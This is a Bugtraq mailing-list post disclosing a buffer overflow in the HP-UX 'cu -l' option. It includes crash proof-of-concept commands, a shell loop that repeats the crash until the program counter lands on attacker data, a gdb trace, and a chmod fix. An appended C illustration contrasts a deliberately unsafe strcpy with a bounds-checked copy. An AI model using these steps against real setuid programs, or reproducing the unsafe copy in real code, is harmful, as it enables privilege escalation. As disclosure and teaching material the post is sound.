Bugtraq mailing list archives

Re: HPUX cu -l option buffer overflow vulnerability


From: "J.A. Gutierrez" <spd () GTC1 CPS UNIZAR ES>
Date: Wed, 8 Nov 2000 11:13:42 +0200


=======================================================
    HPUX cu -l option buffer overflow vulnerability
=======================================================

Date: 02/11/2000
Tested on HP-UX B.11.00

$ cu -l `perl -e 'printf "A" x 9777'`


    It's exploitable on 10.20 (trivial exploit: you don't even
    have to find a return address, the buffer itself gets executed)

    HP-UX 9.x 68k seems to be vulnerable too, but I don't have
    the exploit.

    On HP-UX 11 you need PA-RISC 1.1 shell code, and the PC
    you get with

    ./cu -l `perl -e 'printf "A" x 5667'`

    changes randomly (why?). Eventually you get a pointer to your
    data:


$ while :
do
./cu -l `perl -e 'printf "A" x 5667'`
if file core | egrep -v SIGILL
then
    break
fi
done

[...]
Illegal instruction(coredump)
Connect failed: Requested device/system name not known

Illegal instruction(coredump)
Memory fault(coredump)
core:           core file from 'cu' - received SIGSEGV


$  gdb cu core
[...]
Core was generated by `cu'.
Program terminated with signal 11, Segmentation fault.
Unable to find __dld_flags symbol in object file.

#0  0x7f7eb010 in ?? ()
#0  0x7f7eb010 in ?? ()
(gdb) print {char *} 0x7f7eb010
$1 = 0x41414141 <Address 0x41414141 out of bounds>
(gdb)



    Fix: chmod -s /bin/cu

--
finger spd () gtc1 cps unizar es for PGP       /              So be easy and free
.mailcap tip of the day:                   /      when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null       /            (the pogues)
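Added illustration of the bug class the report describes (not the source of HP-UX cu, which the post does not include): an option argument copied into a fixed-size stack buffer with no length check, next to a bounded version that refuses over-long device names before any copy happens. The buffer name, its size, and the `parse_line_option` helper are hypothetical.

```c
/* Hypothetical model of a setuid tool taking "-l <device>": the unsafe copy
 * is the pattern behind the cu core dumps above; the checked copy is the fix. */
#include <stdio.h>
#include <string.h>

#define LINE_MAX_LEN 64   /* hypothetical size of the device-name buffer */

/* Vulnerable form: strcpy() stops only at the NUL of the argument, so a
 * -l argument longer than the buffer runs off the end of it and over the
 * saved return address (hence PC = 0x41414141 in the gdb session).
 * Kept only for contrast with the checked form below. */
void set_line_unsafe(const char *arg, char *line)
{
    strcpy(line, arg);
}

/* Hardened form: measure the argument without reading past line_sz bytes,
 * and refuse anything that would not fit together with its terminator.
 * Returns 0 on success, -1 if the argument is too long. */
int set_line_checked(const char *arg, char *line, size_t line_sz)
{
    size_t n = 0;
    while (n < line_sz && arg[n] != '\0')
        n++;
    if (n == line_sz)               /* no room for the NUL: would overflow */
        return -1;
    memcpy(line, arg, n + 1);       /* copy including the terminator */
    return 0;
}

/* Scan argv for "-l <device>". 0 = ok, 1 = usage error, 2 = name too long. */
int parse_line_option(int argc, char **argv, char *line, size_t line_sz)
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-l") == 0) {
            if (i + 1 >= argc)
                return 1;
            return set_line_checked(argv[i + 1], line, line_sz) == 0 ? 0 : 2;
        }
    }
    return 1;
}

int main(int argc, char **argv)
{
    char line[LINE_MAX_LEN];
    int rc = parse_line_option(argc, argv, line, sizeof line);
    if (rc == 2)
        fprintf(stderr, "-l: device name too long (max %zu)\n", sizeof line - 1);
    else if (rc == 1)
        fprintf(stderr, "usage: %s -l device\n", argv[0]);
    else
        printf("line = %s\n", line);
    return rc;
}
```

Run as `./a.out -l $(perl -e 'print "A" x 9777')` the checked version exits with an error message instead of a core dump.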

